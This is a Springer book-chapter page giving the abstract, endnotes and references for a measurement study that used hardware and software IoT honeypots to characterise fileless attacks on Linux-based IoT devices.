Abstract
With the wide adoption, Linux-based IoT devices have emerged as one primary target of today’s cyber-attacks. Traditional malware-based attacks can quickly spread across these devices, but they are well-understood threats with effective defense techniques such as malware fingerprinting and community-based fingerprint sharing. Recently, fileless attacks—attacks that do not rely on malware files—have been increasing on Linux-based IoT devices and posing significant threats to the security and privacy of IoT systems. Little has been known in terms of their characteristics and attack vectors, which hinders research and development efforts to defend against them. In this chapter, we present our endeavor in understanding fileless attacks on Linux-based IoT devices in the wild. Over a span of twelve months, we deploy 4 hardware IoT honeypots and 108 specially designed software IoT honeypots and successfully attract a wide variety of real-world IoT attacks. We present our measurement study on these attacks, with a focus on fileless attacks, including the prevalence, exploits, environments, and impacts. Our study further leads to multifold insights toward actionable defense strategies that can be adopted by IoT vendors and end users.
Access this chapter
Tax calculation will be finalised at checkout
Purchases are for personal use only
Notes
- 1.
The rest of connections (i.e., 89.4% of the observed suspicious connections) cannot intrude into our honeypots, since they failed to crack the passwords of our honeypots.
- 2.
Different from previous studies on IoT attacks where fileless attacks were scarcely reported, our honeypots captured substantially more fileless attacks with diverse features. Also, we find that a root cause lies in the weak authentication issue of today’s IoT devices, which makes it unprecedentedly easy for attackers to obtain remote control and then perform malicious actions without using malware.
- 3.
For honeypots deployed in public clouds, the situation can be slightly different since VM instances can report diagnostic data (which are of course legitimate) to cloud providers. Fortunately, such traffic can be easily recognized and we do not consider it in our analysis.
- 4.
A successful login is counted as an effective attack. If any file is downloaded (via wget), it is counted as a malware-based attack. If no file is downloaded but any command is executed, it is counted as a fileless attack.
- 5.
After performing port scanning using nmap, Alibaba Cloud blocked our SSH connection from the same machine.
- 6.
Broadcom and Atheros have made lots of MIPS SoCs for WiFi routers. Ingenic also provides various MIPS solutions.
- 7.
There are a number of PowerPC-based set-top boxes and game consoles like Wii and PlayStation.
- 8.
SPARC-based SoCs have been produced over years, such as LEON.
- 9.
- 10.
Since the collected data were encrypted, we did not have direct, ideal evidence but actually noticed that the patterns well matched. Note that the SSH tunnel is used for forwarding data and does not involve shell interactions, so we cannot decrypt the data using the Shell Interceptor and Inference Terminal (Sect. 9.2.3.2).
References
Zhou Z, Wu C, Yang Z, Liu Y (2015) Sensorless sensing with WiFi. Tsinghua Sci Tech 20(1):1–6
Han J, Pan S, Sinha MK, Noh HY, Zhang P, et al. (2018) Smart home occupant identification via sensor fusion across on-object devices. ACM Trans Sensor Netw 14(3–4):23:1–23:22
Internet of Things Security Research Report (2017) http://www.nsfocus.com.cn/upload/contents/2017/12/20171205171653_35944.pdf
New Trends in the World of IoT Threats (2019) https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/
Antonakakis M, April T, Bailey M, Bernhard M, Bursztein E, et al. (2017) Understanding the Mirai botnet. In: Proceedings of USENIX security
Gandotra E, Bansal D, Sofat S (2014) Malware analysis and classification: A survey. J Inf Secur 05:56–64
MMD-0062-2017 - Credential Harvesting by SSH Direct TCP Forward Attack via IoT Botnet (2017). http://blog.malwaremustdie.org/2017/02/mmd-0062-2017-ssh-direct-tcp-forward-attack.html
Zhu T, Ma Q, Zhang S, Liu Y (2014) Context-free attacks using keyboard acoustic emanations. In: Proceedings of ACM CCS
McAfee Labs: Cybercriminal Tactics Shifting From External Malware Threats to ‘fileless’ Attacks (1982) https://www.dqindia.com/mcafee-labs-cybercriminal-tactics-shifting-external-malware-threats-fileless-attacks/
Now You See Me: Exposing Fileless Malware – Microsoft Secure. https://cloudblogs.microsoft.com/microsoftsecure/2018/01/24/now-you-see-me-exposing-fileless-malware/
Spitzner L (2003) Honeypots: Tracking hackers, vol 1. Addison-Wesley Reading
Provos N (2004) A virtual honeypot framework. In: Proceedings of USENIX security
Dang F, Li Z, Liu Y, Zhai E, Chen QA, Xu T, Chen Y, Yang J (2019) Understanding fileless attacks on Linux-based IoT devices with HoneyCloud. In: Proceedings of ACM MobiSys, pp 482–493
International Organisation for Standardization (ISO) (2016) ISO/IEC 20922:2016 Information technology – Message Queuing Telemetry Transport (MQTT) v3.1.1. http://www.iso.org
Linux - easy way to determine virtualization technology - Unix & Linux stack exchange. https://unix.stackexchange.com/questions/89714/easy-way-to-determine-virtualization-technology
Pa YMP, Suzuki S, Yoshioka K, Matsumoto T, Kasama T, et al. (2015) IoTPOT: Analysing the rise of IoT compromises. In: Proceedings of USENIX WOOT
Raffetseder T, Kruegel C, Kirda E (2007) Detecting system emulators. In: Proceedings of ISC
QEMU emulation detection. https://wiki.koeln.ccc.de/images/d/d5/Openchaos_qemudetect.pdf
NVD - CVE-2018-7262. https://nvd.nist.gov/vuln/detail/CVE-2018-7262
Loi F, Sivanathan A, Gharakheili HH, Radford A, Sivaraman V (2017) Systematically evaluating security and privacy for consumer IoT devices. In: Proceedings of ACM IoT S&P
Donno MD, Dragoni N, Giaretta A, Spognardi A (2018) DDoS-capable IoT malwares: Comparative analysis and Mirai investigation. Secur Commun Networks 7178164:1–7178164:30
Santry DJ, Feeley MJ, Hutchinson NC, Veitch AC (1999) Elephant: The file system that never forgets. In: Proceedings of ACM HotOS
Author information
Authors and Affiliations
Rights and permissions
Copyright information
© 2023 The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd.
About this chapter
Cite this chapter
Li, Z., Dai, Y., Chen, G., Liu, Y. (2023). Understanding IoT Security with HoneyCloud. In: Content Distribution for Mobile Internet: A Cloud-based Approach. Springer, Singapore. https://doi.org/10.1007/978-981-19-6982-9_9
Download citation
DOI: https://doi.org/10.1007/978-981-19-6982-9_9
Published:
Publisher Name: Springer, Singapore
Print ISBN: 978-981-19-6981-2
Online ISBN: 978-981-19-6982-9
eBook Packages: Computer ScienceComputer Science (R0)